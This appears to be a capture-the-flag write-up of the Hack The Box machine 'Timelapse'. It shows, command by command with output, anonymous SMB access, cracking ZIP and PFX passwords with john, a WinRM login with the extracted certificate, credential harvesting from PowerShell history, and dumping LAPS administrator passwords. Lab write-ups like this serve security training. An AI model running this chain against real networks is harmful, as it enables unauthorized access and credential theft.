Learned a lot doing this box. It starts off with accessing an open SMB share that contains a password protected ZIP. Cracking the password for the ZIP allowed access to a PFX file. After cracking the password associated with the PFX file I was able to extract a .crt and .key file. Using those files, I was able to login via WinRM.
After doing some recon on the local box I discovered a clear text password for another user in the PowerShell history file. Said user was part of a group that could read LAPS passwords. And it just so happened to be the password for the administrator account.
Initial Recon
Started with the standard nmap scan. Followed by a more comprehensive scan to check all TCP ports.
For a long while I got in a bad habit of only using nmap‘s’ default port range of the top 1000 most commonly used ports. There would be times where I would bang my head against the wall for hours only to later realize that a scan of all 65,000-ish TCP ports had to be done because a service was open on some non-standard port.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.133.91
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 12:02 CDT
Nmap scan report for 10.129.133.91
Host is up (0.057s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-24 01:02:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-24T01:02:56
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.06 secondsBelow is the results of a nmap scan against all TCP ports. The difference in information from the two scans is clearly evident.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo nmap -A -T4 -p- -oA nmap/full 10.129.133.91
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 12:02 CDT
Nmap scan report for 10.129.133.91
Host is up (0.057s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-24 01:04:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-04-24T01:06:09+00:00; +8h00m00s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
58679/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-24T01:05:33
|_ start_date: N/A
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 63.10 ms 10.10.14.1
2 63.14 ms 10.129.133.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.52 secondsThere are quite a few ports open, but the ones of note are – SMB on port 445 and WinRM over HTTPS on port 5986.
Initial Access
SMB
The first thing I do when I see SMB is list shares, if possible. Fortunately, an anonymous login was allowed so I could list and connect to shares.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ smbclient --no-pass -L //$tgt
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableConnecting to Shares revealed a couple interesting directories. Ended up pulling everything down and taking a look at the files.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ smbclient -U '' \\\\$tgt\\Shares
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 10:39:15 2021
.. D 0 Mon Oct 25 10:39:15 2021
Dev D 0 Mon Oct 25 14:40:06 2021
HelpDesk D 0 Mon Oct 25 10:48:42 2021
6367231 blocks of size 4096. 1283328 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *In the Dev folder there was winrm_backup.zip which was password protected. Time to get cracking with john! The first step is to use zip2john to create a hash that can then be cracked with john.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ john --wordlist=/opt/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-08-26 08:18) 4.166g/s 14472Kp/s 14472Kc/s 14472KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Within the ZIP is a PFX file. The PFX file, which is in a PKCS#12 format, contains the SSL certificate (public keys) and the corresponding private keys. This file could be my way into the system. WinRM was running over HTTPS so it requires a .key and .crt for login. Fortunately, with this PFX file I can create those two files. But first I must discover the password associated with this PFX file before extracting the public and private keys. Luckily, john can help with the first step.
First I create a hash of the PFX file with pfx2john and then crack it with john.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ pfx2john legacyy_dev_auth.pfx > legacy_hash.txt
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 24
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zip
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy_hash.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:56 DONE (2022-04-23 20:58) 0.01776g/s 57413p/s 57413c/s 57413C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed. With the password I can now extract the encrypted .key file from the PFX file.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out keyfilename-encrypted.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 28
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zipThen I extract the .crt file from the PFX file.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificatename.crt 130 ⨯
Enter Import Password:
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 32
-rw------- 1 crimson crimson 1238 Apr 23 21:01 certificatename.crt
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zipThen I decrypt the .key file from earlier.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl rsa -in keyfilename-encrypted.key -out keyfilename-decrypted.key
Enter pass phrase for keyfilename-encrypted.key:
writing RSA key
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 36
-rw------- 1 crimson crimson 1238 Apr 23 21:01 certificatename.crt
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 1675 Apr 23 21:02 keyfilename-decrypted.key
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zipI used the following resource to guide me through this process – https://medium.com/beingcoders/easy-way-to-convert-pfx-to-crt-key-files-in-10-minutes-683849242c65
RDP
Now that I have the .key and .crt files, I connect with Evil-WinRM. Remember, nmap revealed WinRM on port 5986. That port signifies that WinRM is ran within HTTPS which requires a certificate.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ evil-winrm -u legacyy -r TIMELAPSE -i $tgt -S -p 5986 -c certificatename.crt -k keyfilename-decrypted.key 1 ⨯
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Warning: User is not needed for Kerberos auth. Ticket will be used
Warning: Password is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyyAfter doing a little bit of research I found HackTricks’ guide to Windows Priv Esc. One thing he suggest you check is PowerShell history in ConsoleHost_history.txt. In this case it revealed clear text credentials for the user svc_deploy.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitPriv Esc
PowerShell
With the credentials found in ConsoleHost_history.txt, I login via evil-winrm. From there I look to see what groups the user is part of.
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ evil-winrm -r TIMELAPSE -i $tgt -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Warning: User is not needed for Kerberos auth. Ticket will be used
Warning: Password is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/3/2022 1:39:56 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.LAPS
svc_deploy seems to be part of the LAPS_Readers group. Seems obvious what kind of permissions that group has so I attempted read LAPS passwords with lapsdumper. And sure enough I get a password!
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo lapsdumper -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -l 10.129.116.35 -d timelapse.htb 1 ⨯
DC01$:ch6M-56,jf64Qs2TnwuZK]6VWith administrator credentials I used what was found in the PowerShell history file to run commands to view the flag.
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'ch6M-56,jf64Qs2TnwuZK]6V' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('administrator', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{whoami}
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{gci C:\Users -recurse}
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{get-content C:\users\trx\desktop\root.txt}